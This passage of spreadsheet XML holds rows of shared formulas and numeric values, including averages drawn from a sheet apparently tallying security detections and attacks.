        <f t="shared" si="177"/>
        <v>1</v>
      </c>
      <c r="CI120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CJ120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CK120" s="518">
        <f t="shared" si="177"/>
        <v>8</v>
      </c>
      <c r="CL120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CM120" s="518">
        <f t="shared" si="177"/>
        <v>1.5</v>
      </c>
      <c r="CN120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CO120" s="518">
        <f t="shared" si="177"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP120" s="518">
        <f t="shared" si="177"/>
        <v>11.5</v>
      </c>
      <c r="CQ120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CR120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CS120" s="518">
        <f t="shared" si="177"/>
        <v>0.02458697765</v>
      </c>
      <c r="CT120" s="518">
        <f t="shared" si="177"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CV120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CW120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="CX120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="CY120" s="518">
        <f t="shared" si="177"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="DA120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="DB120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="DC120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="DD120" s="518">
        <f t="shared" si="177"/>
        <v>5</v>
      </c>
      <c r="DE120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DF120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DG120" s="518" t="str">
        <f t="shared" si="177"/>
        <v>-</v>
      </c>
      <c r="DH120" s="518">
        <f t="shared" si="177"/>
        <v>0.04</v>
      </c>
      <c r="DI120" s="518">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DJ120" s="519">
        <f t="shared" si="177"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK120" s="271"/>
      <c r="EG120" s="279"/>
      <c r="EH120" s="271"/>
      <c r="EI120" s="271"/>
      <c r="EJ120" s="271"/>
      <c r="EK120" s="271"/>
      <c r="EL120" s="271"/>
      <c r="EM120" s="271"/>
      <c r="ER120" s="271"/>
      <c r="ES120" s="271"/>
      <c r="ET120" s="271"/>
      <c r="EU120" s="271"/>
      <c r="EV120" s="271"/>
      <c r="EW120" s="271"/>
      <c r="EX120" s="271"/>
      <c r="EY120" s="271"/>
      <c r="EZ120" s="271"/>
      <c r="FA120" s="280"/>
    </row>
    <row r="121">
      <c r="J121" s="277"/>
      <c r="K121" s="500">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BP3:BP139)</f>
        <v>75.29745389</v>
      </c>
      <c r="L121" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DF3:DF139)</f>
        <v>1806.269128</v>
      </c>
      <c r="M121" s="501">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EV3:EV139)</f>
        <v>2423.98002</v>
      </c>
      <c r="N121" s="502">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GL3:GL139)</f>
        <v>3636.022451</v>
      </c>
      <c r="O121" s="278"/>
      <c r="Q121" s="271"/>
      <c r="R121" s="386" t="s">
        <v>2593</v>
      </c>
      <c r="S121" s="501">
        <f t="shared" ref="S121:V121" si="178">S73/S$31</f>
        <v>0.7384637958</v>
      </c>
      <c r="T121" s="501">
        <f t="shared" si="178"/>
        <v>0.01424340292</v>
      </c>
      <c r="U121" s="501">
        <f t="shared" si="178"/>
        <v>0.126984127</v>
      </c>
      <c r="V121" s="501">
        <f t="shared" si="178"/>
        <v>0.4210526316</v>
      </c>
      <c r="W121" s="501">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="X121" s="501">
        <f t="shared" ref="X121:AF121" si="179">X73/X$31</f>
        <v>0.09090909091</v>
      </c>
      <c r="Y121" s="501">
        <f t="shared" si="179"/>
        <v>113.1428571</v>
      </c>
      <c r="Z121" s="501">
        <f t="shared" si="179"/>
        <v>0.9009795822</v>
      </c>
      <c r="AA121" s="501">
        <f t="shared" si="179"/>
        <v>0.07204610951</v>
      </c>
      <c r="AB121" s="501">
        <f t="shared" si="179"/>
        <v>0.8695652174</v>
      </c>
      <c r="AC121" s="501">
        <f t="shared" si="179"/>
        <v>2.4</v>
      </c>
      <c r="AD121" s="501">
        <f t="shared" si="179"/>
        <v>0.02427603204</v>
      </c>
      <c r="AE121" s="501">
        <f t="shared" si="179"/>
        <v>2.208333333</v>
      </c>
      <c r="AF121" s="502">
        <f t="shared" si="179"/>
        <v>0.001650021711</v>
      </c>
      <c r="AG121" s="271"/>
      <c r="AH121" s="386" t="s">
        <v>2593</v>
      </c>
      <c r="AI121" s="518">
        <f t="shared" ref="AI121:DJ121" si="180">IF(AI$30=0,"-",AI73/AI$31)</f>
        <v>0.7386422018</v>
      </c>
      <c r="AJ121" s="518">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="AK121" s="518">
        <f t="shared" si="180"/>
        <v>0.25</v>
      </c>
      <c r="AL121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="AM121" s="518">
        <f t="shared" si="180"/>
        <v>0.01424340292</v>
      </c>
      <c r="AN121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AO121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AP121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AQ121" s="518">
        <f t="shared" si="180"/>
        <v>0.02564102564</v>
      </c>
      <c r="AR121" s="518">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="AS121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AT121" s="518">
        <f t="shared" si="180"/>
        <v>3</v>
      </c>
      <c r="AU121" s="518">
        <f t="shared" si="180"/>
        <v>2</v>
      </c>
      <c r="AV121" s="518">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="AW121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AX121" s="518">
        <f t="shared" si="180"/>
        <v>0.5</v>
      </c>
      <c r="AY121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="AZ121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BA121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BB121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BC121" s="518">
        <f t="shared" si="180"/>
        <v>0.3333333333</v>
      </c>
      <c r="BD121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BE121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BF121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BG121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BH121" s="518">
        <f t="shared" si="180"/>
        <v>792</v>
      </c>
      <c r="BI121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BJ121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BK121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BL121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BM121" s="518">
        <f t="shared" si="180"/>
        <v>0.1998784933</v>
      </c>
      <c r="BN121" s="518">
        <f t="shared" si="180"/>
        <v>1.346718147</v>
      </c>
      <c r="BO121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BP121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BQ121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BR121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BS121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BT121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BU121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BV121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BW121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="BX121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="BY121" s="518">
        <f t="shared" si="180"/>
        <v>0.1111111111</v>
      </c>
      <c r="BZ121" s="518">
        <f t="shared" si="180"/>
        <v>0.162601626</v>
      </c>
      <c r="CA121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CB121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CC121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CD121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CE121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CF121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CG121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CH121" s="518">
        <f t="shared" si="180"/>
        <v>1</v>
      </c>
      <c r="CI121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CJ121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CK121" s="518">
        <f t="shared" si="180"/>
        <v>8</v>
      </c>
      <c r="CL121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CM121" s="518">
        <f t="shared" si="180"/>
        <v>1.5</v>
      </c>
      <c r="CN121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CO121" s="518">
        <f t="shared" si="180"/>
        <v>0.1666666667</v>
      </c>
      <c r="CP121" s="518">
        <f t="shared" si="180"/>
        <v>11.5</v>
      </c>
      <c r="CQ121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CR121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CS121" s="518">
        <f t="shared" si="180"/>
        <v>0.02458697765</v>
      </c>
      <c r="CT121" s="518">
        <f t="shared" si="180"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CV121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CW121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="CX121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="CY121" s="518">
        <f t="shared" si="180"/>
        <v>2.823529412</v>
      </c>
      <c r="CZ121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="DA121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="DB121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="DC121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="DD121" s="518">
        <f t="shared" si="180"/>
        <v>5</v>
      </c>
      <c r="DE121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DF121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG121" s="518" t="str">
        <f t="shared" si="180"/>
        <v>-</v>
      </c>
      <c r="DH121" s="518">
        <f t="shared" si="180"/>
        <v>0.04</v>
      </c>
      <c r="DI121" s="518">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DJ121" s="519">
        <f t="shared" si="180"/>
        <v>0.09090909091</v>
      </c>
      <c r="DK121" s="271"/>
      <c r="EG121" s="279"/>
      <c r="EH121" s="271"/>
      <c r="EI121" s="271"/>
      <c r="EJ121" s="271"/>
      <c r="EK121" s="271"/>
      <c r="EL121" s="271"/>
      <c r="EM121" s="271"/>
      <c r="ER121" s="271"/>
      <c r="ES121" s="271"/>
      <c r="ET121" s="271"/>
      <c r="EU121" s="271"/>
      <c r="EV121" s="271"/>
      <c r="EW121" s="271"/>
      <c r="EX121" s="271"/>
      <c r="EY121" s="271"/>
      <c r="EZ121" s="271"/>
      <c r="FA121" s="280"/>
    </row>
    <row r="122">
      <c r="J122" s="277"/>
      <c r="K122" s="434"/>
      <c r="L122" s="353"/>
      <c r="M122" s="353"/>
      <c r="N122" s="354"/>
      <c r="O122" s="278"/>
      <c r="Q122" s="271"/>
      <c r="R122" s="352" t="s">
        <v>2594</v>
      </c>
      <c r="S122" s="501">
        <f t="shared" ref="S122:V122" si="181">S74/S$31</f>
        <v>53.15868242</v>
      </c>
      <c r="T122" s="501">
        <f t="shared" si="181"/>
        <v>1.025500791</v>
      </c>
      <c r="U122" s="501">
        <f t="shared" si="181"/>
        <v>4.857142857</v>
      </c>
      <c r="V122" s="501">
        <f t="shared" si="181"/>
        <v>1.947368421</v>
      </c>
      <c r="W122" s="501">
        <f t="shared" si="104"/>
        <v>12</v>
      </c>
      <c r="X122" s="501">
        <f t="shared" ref="X122:AF122" si="182">X74/X$31</f>
        <v>8332.818182</v>
      </c>
      <c r="Y122" s="501">
        <f t="shared" si="182"/>
        <v>114.5714286</v>
      </c>
      <c r="Z122" s="501">
        <f t="shared" si="182"/>
        <v>537.2653133</v>
      </c>
      <c r="AA122" s="501">
        <f t="shared" si="182"/>
        <v>1.515850144</v>
      </c>
      <c r="AB122" s="501">
        <f t="shared" si="182"/>
        <v>3.565217391</v>
      </c>
      <c r="AC122" s="501">
        <f t="shared" si="182"/>
        <v>4.2</v>
      </c>
      <c r="AD122" s="501">
        <f t="shared" si="182"/>
        <v>0.1309782981</v>
      </c>
      <c r="AE122" s="501">
        <f t="shared" si="182"/>
        <v>3.125</v>
      </c>
      <c r="AF122" s="502">
        <f t="shared" si="182"/>
        <v>1.011897525</v>
      </c>
      <c r="AG122" s="271"/>
      <c r="AH122" s="352" t="s">
        <v>2594</v>
      </c>
      <c r="AI122" s="518">
        <f t="shared" ref="AI122:DJ122" si="183">IF(AI$30=0,"-",AI74/AI$31)</f>
        <v>53.18150459</v>
      </c>
      <c r="AJ122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="AK122" s="518">
        <f t="shared" si="183"/>
        <v>1.75</v>
      </c>
      <c r="AL122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="AM122" s="518">
        <f t="shared" si="183"/>
        <v>1.025500791</v>
      </c>
      <c r="AN122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AO122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AP122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AQ122" s="518">
        <f t="shared" si="183"/>
        <v>2.991452991</v>
      </c>
      <c r="AR122" s="518">
        <f t="shared" si="183"/>
        <v>61.75</v>
      </c>
      <c r="AS122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AT122" s="518">
        <f t="shared" si="183"/>
        <v>4</v>
      </c>
      <c r="AU122" s="518">
        <f t="shared" si="183"/>
        <v>4.5</v>
      </c>
      <c r="AV122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="AW122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AX122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="AY122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="AZ122" s="518">
        <f t="shared" si="183"/>
        <v>4.5</v>
      </c>
      <c r="BA122" s="518">
        <f t="shared" si="183"/>
        <v>12</v>
      </c>
      <c r="BB122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BC122" s="518">
        <f t="shared" si="183"/>
        <v>30549.66667</v>
      </c>
      <c r="BD122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BE122" s="518">
        <f t="shared" si="183"/>
        <v>2</v>
      </c>
      <c r="BF122" s="518">
        <f t="shared" si="183"/>
        <v>1.5</v>
      </c>
      <c r="BG122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="BH122" s="518">
        <f t="shared" si="183"/>
        <v>792</v>
      </c>
      <c r="BI122" s="518">
        <f t="shared" si="183"/>
        <v>2</v>
      </c>
      <c r="BJ122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="BK122" s="518">
        <f t="shared" si="183"/>
        <v>1.666666667</v>
      </c>
      <c r="BL122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="BM122" s="518">
        <f t="shared" si="183"/>
        <v>1054.317132</v>
      </c>
      <c r="BN122" s="518">
        <f t="shared" si="183"/>
        <v>208.7714286</v>
      </c>
      <c r="BO122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BP122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BQ122" s="518">
        <f t="shared" si="183"/>
        <v>1.004901961</v>
      </c>
      <c r="BR122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BS122" s="518">
        <f t="shared" si="183"/>
        <v>0.5</v>
      </c>
      <c r="BT122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="BU122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BV122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="BW122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="BX122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="BY122" s="518">
        <f t="shared" si="183"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ122" s="518">
        <f t="shared" si="183"/>
        <v>2.162601626</v>
      </c>
      <c r="CA122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CB122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CC122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CD122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="CE122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CF122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="CG122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CH122" s="518">
        <f t="shared" si="183"/>
        <v>6</v>
      </c>
      <c r="CI122" s="518">
        <f t="shared" si="183"/>
        <v>34</v>
      </c>
      <c r="CJ122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CK122" s="518">
        <f t="shared" si="183"/>
        <v>14</v>
      </c>
      <c r="CL122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CM122" s="518">
        <f t="shared" si="183"/>
        <v>6</v>
      </c>
      <c r="CN122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CO122" s="518">
        <f t="shared" si="183"/>
        <v>2.166666667</v>
      </c>
      <c r="CP122" s="518">
        <f t="shared" si="183"/>
        <v>14.5</v>
      </c>
      <c r="CQ122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="CR122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CS122" s="518">
        <f t="shared" si="183"/>
        <v>0.1326669443</v>
      </c>
      <c r="CT122" s="518">
        <f t="shared" si="183"/>
        <v>0.001996007984</v>
      </c>
      <c r="CU122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CV122" s="518">
        <f t="shared" si="183"/>
        <v>1</v>
      </c>
      <c r="CW122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="CX122" s="518">
        <f t="shared" si="183"/>
        <v>3.5</v>
      </c>
      <c r="CY122" s="518">
        <f t="shared" si="183"/>
        <v>3.764705882</v>
      </c>
      <c r="CZ122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DA122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DB122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DC122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DD122" s="518">
        <f t="shared" si="183"/>
        <v>7</v>
      </c>
      <c r="DE122" s="518">
        <f t="shared" si="183"/>
        <v>0.8</v>
      </c>
      <c r="DF122" s="518">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DG122" s="518" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DH122" s="518">
        <f t="shared" si="183"/>
        <v>0.04888888889</v>
      </c>
      <c r="DI122" s="518">
        <f t="shared" si="183"/>
        <v>1.050303085</v>
      </c>
      <c r="DJ122" s="519">
        <f t="shared" si="183"/>
        <v>0.8181818182</v>
      </c>
      <c r="DK122" s="271"/>
      <c r="EG122" s="279"/>
      <c r="EH122" s="271"/>
      <c r="EI122" s="271"/>
      <c r="EJ122" s="271"/>
      <c r="EK122" s="271"/>
      <c r="EL122" s="271"/>
      <c r="EM122" s="271"/>
      <c r="ER122" s="271"/>
      <c r="ES122" s="271"/>
      <c r="ET122" s="271"/>
      <c r="EU122" s="271"/>
      <c r="EV122" s="271"/>
      <c r="EW122" s="271"/>
      <c r="EX122" s="271"/>
      <c r="EY122" s="271"/>
      <c r="EZ122" s="271"/>
      <c r="FA122" s="280"/>
    </row>
    <row r="123">
      <c r="J123" s="277"/>
      <c r="K123" s="352" t="s">
        <v>2578</v>
      </c>
      <c r="L123" s="403" t="s">
        <v>2579</v>
      </c>
      <c r="M123" s="403" t="s">
        <v>2580</v>
      </c>
      <c r="N123" s="404" t="s">
        <v>2581</v>
      </c>
      <c r="O123" s="278"/>
      <c r="Q123" s="271"/>
      <c r="R123" s="386" t="s">
        <v>2595</v>
      </c>
      <c r="S123" s="501">
        <f t="shared" ref="S123:V123" si="184">S75/S$31</f>
        <v>53.15868242</v>
      </c>
      <c r="T123" s="501">
        <f t="shared" si="184"/>
        <v>1.025500791</v>
      </c>
      <c r="U123" s="501">
        <f t="shared" si="184"/>
        <v>4.857142857</v>
      </c>
      <c r="V123" s="501">
        <f t="shared" si="184"/>
        <v>1.947368421</v>
      </c>
      <c r="W123" s="501">
        <f t="shared" si="104"/>
        <v>12</v>
      </c>
      <c r="X123" s="501">
        <f t="shared" ref="X123:AF123" si="185">X75/X$31</f>
        <v>8332.818182</v>
      </c>
      <c r="Y123" s="501">
        <f t="shared" si="185"/>
        <v>114.5714286</v>
      </c>
      <c r="Z123" s="501">
        <f t="shared" si="185"/>
        <v>537.2653133</v>
      </c>
      <c r="AA123" s="501">
        <f t="shared" si="185"/>
        <v>1.515850144</v>
      </c>
      <c r="AB123" s="501">
        <f t="shared" si="185"/>
        <v>3.565217391</v>
      </c>
      <c r="AC123" s="501">
        <f t="shared" si="185"/>
        <v>4.2</v>
      </c>
      <c r="AD123" s="501">
        <f t="shared" si="185"/>
        <v>0.1309782981</v>
      </c>
      <c r="AE123" s="501">
        <f t="shared" si="185"/>
        <v>3.125</v>
      </c>
      <c r="AF123" s="502">
        <f t="shared" si="185"/>
        <v>1.011897525</v>
      </c>
      <c r="AG123" s="271"/>
      <c r="AH123" s="386" t="s">
        <v>2595</v>
      </c>
      <c r="AI123" s="518">
        <f t="shared" ref="AI123:DJ123" si="186">IF(AI$30=0,"-",AI75/AI$31)</f>
        <v>53.18150459</v>
      </c>
      <c r="AJ123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="AK123" s="518">
        <f t="shared" si="186"/>
        <v>1.75</v>
      </c>
      <c r="AL123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="AM123" s="518">
        <f t="shared" si="186"/>
        <v>1.025500791</v>
      </c>
      <c r="AN123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AO123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AP123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AQ123" s="518">
        <f t="shared" si="186"/>
        <v>2.991452991</v>
      </c>
      <c r="AR123" s="518">
        <f t="shared" si="186"/>
        <v>61.75</v>
      </c>
      <c r="AS123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AT123" s="518">
        <f t="shared" si="186"/>
        <v>4</v>
      </c>
      <c r="AU123" s="518">
        <f t="shared" si="186"/>
        <v>4.5</v>
      </c>
      <c r="AV123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="AW123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AX123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="AY123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="AZ123" s="518">
        <f t="shared" si="186"/>
        <v>4.5</v>
      </c>
      <c r="BA123" s="518">
        <f t="shared" si="186"/>
        <v>12</v>
      </c>
      <c r="BB123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BC123" s="518">
        <f t="shared" si="186"/>
        <v>30549.66667</v>
      </c>
      <c r="BD123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BE123" s="518">
        <f t="shared" si="186"/>
        <v>2</v>
      </c>
      <c r="BF123" s="518">
        <f t="shared" si="186"/>
        <v>1.5</v>
      </c>
      <c r="BG123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="BH123" s="518">
        <f t="shared" si="186"/>
        <v>792</v>
      </c>
      <c r="BI123" s="518">
        <f t="shared" si="186"/>
        <v>2</v>
      </c>
      <c r="BJ123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="BK123" s="518">
        <f t="shared" si="186"/>
        <v>1.666666667</v>
      </c>
      <c r="BL123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="BM123" s="518">
        <f t="shared" si="186"/>
        <v>1054.317132</v>
      </c>
      <c r="BN123" s="518">
        <f t="shared" si="186"/>
        <v>208.7714286</v>
      </c>
      <c r="BO123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BP123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BQ123" s="518">
        <f t="shared" si="186"/>
        <v>1.004901961</v>
      </c>
      <c r="BR123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BS123" s="518">
        <f t="shared" si="186"/>
        <v>0.5</v>
      </c>
      <c r="BT123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="BU123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BV123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="BW123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="BX123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="BY123" s="518">
        <f t="shared" si="186"/>
        <v>4.777777778</v>
      </c>
      <c r="BZ123" s="518">
        <f t="shared" si="186"/>
        <v>2.162601626</v>
      </c>
      <c r="CA123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CB123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CC123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CD123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="CE123" s="518" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="CF123" s="518">
        <f t="shared" si="186"/>
        <v>1</v>
      </c>
      <c r="CG123" s="518">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="CH123" s="518">
        <f t="shared" si="186"/>
        <v>6</v>
      </c>
      <c r="CI123" s="518">
        <f t="shared" si="186"/>
        <v>34</v>
      </c>
      <c r="CJ123" s="518">
